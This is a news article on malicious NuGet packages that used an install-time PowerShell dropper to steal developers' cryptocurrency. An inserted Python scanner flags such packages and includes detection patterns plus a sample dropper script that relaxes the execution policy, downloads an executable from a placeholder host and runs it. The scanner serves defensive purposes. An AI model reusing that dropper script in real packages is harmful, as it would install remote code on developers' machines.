Crypto crooks target .NET developers in new campaign


.NET developers are being targeted by malware designed to steal their cryptocurrency, according to new reports.

JFrog cybersecurity researchers recently detected an active campaign where malicious packages were uploaded to the NuGet repository for .NET developers to download and use.

When a package is installed, it runs a PowerShell dropper, init.ps1, which first changes the host's PowerShell execution policy so that scripts can run without restriction.

Custom payloads

This behavior alone was enough of a red flag to warrant removal of the package, the researchers suggest: "This behavior is extremely rare outside of malicious packages, especially given the 'Unlimited' execution policy, which should immediately trigger a signal of alarm".

Still, if allowed to run without interruption, the package then downloads and runs a "fully customized executable payload" for Windows, the researchers added. That too is unusual, the analysts said, because attackers typically reuse open source tooling to save time.
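The behavior described above (an install-time init.ps1 that relaxes the execution policy, fetches an executable and runs it) is exactly what a package audit should flag before the script ever reaches a developer's machine. The scanner below is an added example, not JFrog's tooling or the article's code. A .nupkg is a zip archive; legacy packages can ship tools/init.ps1 or tools/install.ps1, which NuGet executes in Visual Studio's Package Manager Console (not from the dotnet CLI). The sample package and the indicator patterns are constructed for this example; the "suspicious" script only points at a placeholder URL and is a stand-in for the dropper behavior, not the real one.

```python
"""Added example (not JFrog's or the article's code): scan a .nupkg for
install-time PowerShell scripts and flag the dropper behaviours the article
describes. The sample package and indicator list are constructed here."""

import io
import re
import zipfile

# Indicators a practitioner would look for in an install-time script.
# Keys are labels, values are case-insensitive regexes. Constructed for
# this example, not a published rule set.
INDICATORS = {
    "execution policy relaxed": r"Set-ExecutionPolicy\s+(-ExecutionPolicy\s+)?(Unrestricted|Bypass)",
    "remote download": r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer",
    "executes fetched content": r"Invoke-Expression|\biex\b|Start-Process|\[Diagnostics\.Process\]::Start",
    "encoded command": r"-EncodedCommand|FromBase64String",
}

# Scripts NuGet runs automatically from the package's tools/ folder.
SCRIPT_PATHS = re.compile(r"^tools/(init|install|uninstall)\.ps1$", re.IGNORECASE)


def scan_nupkg(data: bytes) -> dict:
    """Return {script_path: [matched indicator labels]} for every install-time
    script in the package bytes. An empty dict means no such scripts exist."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not SCRIPT_PATHS.match(name.replace("\\", "/")):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            hits = [label for label, pattern in INDICATORS.items()
                    if re.search(pattern, text, re.IGNORECASE)]
            findings[name] = hits
    return findings


def verdict(findings: dict) -> str:
    """Collapse scan findings into a triage verdict."""
    if not findings:
        return "clean: no install-time PowerShell"
    if any("execution policy relaxed" in hits or "remote download" in hits
           for hits in findings.values()):
        return "malicious-looking: quarantine and report"
    return "review: install-time script present"


def build_sample_package(script=None) -> bytes:
    """Construct a minimal .nupkg in memory: a nuspec plus, if given,
    tools/init.ps1 holding `script`. Hypothetical package, for this example."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Example.Package.nuspec",
                    "<package><metadata><id>Example.Package</id>"
                    "<version>1.0.0</version></metadata></package>")
        if script is not None:
            zf.writestr("tools/init.ps1", script)
    return buf.getvalue()


# Constructed stand-in for the dropper behaviour the article describes:
# relax the execution policy, fetch an executable, run it. The URL is a
# placeholder, not an indicator from the real campaign.
SUSPICIOUS_INIT = """param($installPath, $toolsPath, $package)
Set-ExecutionPolicy Unrestricted -Scope Process -Force
$u = 'https://example.invalid/payload.exe'
(New-Object Net.WebClient).DownloadFile($u, "$env:TEMP\\p.exe")
Start-Process "$env:TEMP\\p.exe"
"""

# A benign init.ps1 that only loads a module shipped in the package.
BENIGN_INIT = """param($installPath, $toolsPath, $package)
Import-Module (Join-Path $toolsPath 'Example.psm1')
"""

if __name__ == "__main__":
    for label, script in (("suspicious", SUSPICIOUS_INIT), ("benign", BENIGN_INIT), ("no script", None)):
        f = scan_nupkg(build_sample_package(script))
        print(f"{label}: {f} -> {verdict(f)}")
```

Any install-time script is worth a look, since legitimate packages rarely need one; the execution-policy change and the remote fetch together are the combination the researchers called out, so those two indicators alone escalate a package to quarantine. To scan a real feed, read each downloaded .nupkg from disk and pass its bytes to scan_nupkg.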

To bolster their legitimacy, the attackers did two things. First, they set up their NuGet profiles to pose as Microsoft software developers working on the NuGet .NET package manager.

Second, the malicious packages showed download counts in the hundreds of thousands, which makes them look established and widely used. That could mean the campaign genuinely spread that far, the researchers said, but it is more likely that the attackers used bots to inflate the counts artificially and reassure developers that the packages were safe to use.

"The first three packages were downloaded an incredible number of times; this could be an indicator that the attack was very successful and infected a large number of machines," JFrog security researchers said. "However, this is not a completely reliable indicator of the success of the attack, as the attackers could have automatically inflated the number of downloads (with bots) to make the packages more legitimate."

Via: BleepingComputer